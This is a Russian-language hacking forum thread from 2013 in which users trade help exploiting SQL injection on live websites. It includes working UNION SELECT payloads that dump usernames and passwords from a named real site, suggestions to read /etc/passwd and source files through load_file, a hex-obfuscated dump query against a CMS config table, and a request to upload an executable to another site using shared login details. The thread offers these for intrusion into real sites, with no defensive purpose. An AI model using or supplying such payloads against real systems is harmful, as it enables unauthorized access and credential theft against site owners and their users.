ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.05.2013, 22:16
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]Сообщение от sabe
http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.skintologyny.com/admin/login.php
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23
[/COLOR][COLOR="#0000BB"]почему не могу войти[/COLOR][COLOR="#007700"]?[/COLOR][/COLOR]
Сообщение от foma2120
foma2120 said:
Там много страниц авторизации
http://www.skintologyny.com/blog/wp-login.php
http://www.skintologyny.com/admin/login.php/admin/verifylogin.php
это ведь не от блога пароли указал а от users... а wp_users я не нашел такую таблицу в куррент дб, может кто угадает базу где блог..
а вторая ссылка что ты скинул это верифай логин походу одно и то же что вход в админку почему не пускает оч интересно проблема не решена
помогите узнать ответ)
|
|
|

14.05.2013, 01:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Добрый день, подскажите, что это за БД такая, с рашрирениями файлов *.bcp, *.idx, *.pre и *.sch
Спасибо
|
|
|
|

14.05.2013, 04:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 1704
Репутация:
0
|
|
Подскажите что делать далее? Вот нашлась уязвимость:
Source: Form Method: POST
Parameter Name Parameter Type Test Name Severity
+ userid POST SQL Injection (blind test) High
+ submit POST SQL Injection (blind test) High
+ m2hp COOKIE SQL Injection (blind test) High
Как поступать дальше?
|
|
|
|

14.05.2013, 06:29
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от x-promt
x-promt said:
Подскажите что делать далее? Вот нашлась уязвимость:
Source: Form Method: POST
Parameter Name Parameter Type Test Name Severity
+ userid POST SQL Injection (blind test) High
+ submit POST SQL Injection (blind test) High
+ m2hp COOKIE SQL Injection (blind test) High
Как поступать дальше?
Крутить как блайнды. Тебе же написали в каких параметрах SQL инъекты.
|
|
|

14.05.2013, 15:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 3581
Репутация:
0
|
|
День добрый!
Есть ли возможность залить исполняймый файл в данном месте
Код:
Code:
http://play-me.ru/users/fileupload/edit
Login:fileupload
pass:fileupload
|
|
|
|

14.05.2013, 20:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 77731
Репутация:
33
|
|
Есть уязвимый сайт:
Код:
Code:
http://www.site.com/?parametr1=parametr2&id=-99'
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id like '-99'''.
/duyurular.asp, line 5
при
Код:
Code:
+union+select+1,2+from+MSysModules2%00#
и так далее выходит вот такая ошибка:
Сообщение от None
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
Кто знает как раскурить такую скулю и в чем вообще проблма с ней?
|
|
|
|

16.05.2013, 15:46
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме: 189651
Репутация:
-5
|
|
Есть скуль такого вида:
site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6
Выводимые поля 2,5,6
Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3, 4,5,6+from+mysql.user+where+user='ask_user'
На что получаю ошибку
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
|
|
|

16.05.2013, 15:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
всё правильно делаешь, ток может там ковычки фильтруются и из-за этого ошибка
|
|
|
|

16.05.2013, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Есть скуль такого вида:
site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6
Выводимые поля 2,5,6
Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3, 4,5,6+from+mysql.user+where+user='ask_user'
На что получаю ошибку
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
Че дурью то маяться?load_file('/etc/passwd') ; load_file('/home/site/public_html/ask.php')
|
|
|
|

16.05.2013, 16:18
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме: 189651
Репутация:
-5
|
|
попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету
Через софт вот таким запросом выводит содержимое таблицы
site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(se lect+concat(0x7e,0x27,unhex(Hex(cast(cms_config.co nfig_name+as+char))),0x27,0x7e)+from+`site_db`.cms _config+limit+0,1)+,0x31303235343830303536,0x31303 235343830303536,0x31303235343830303536,0x313032353 43830303536,0x31303235343830303536--
Както выводит содержимое нормально...Но как вывести этот file_priv то?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|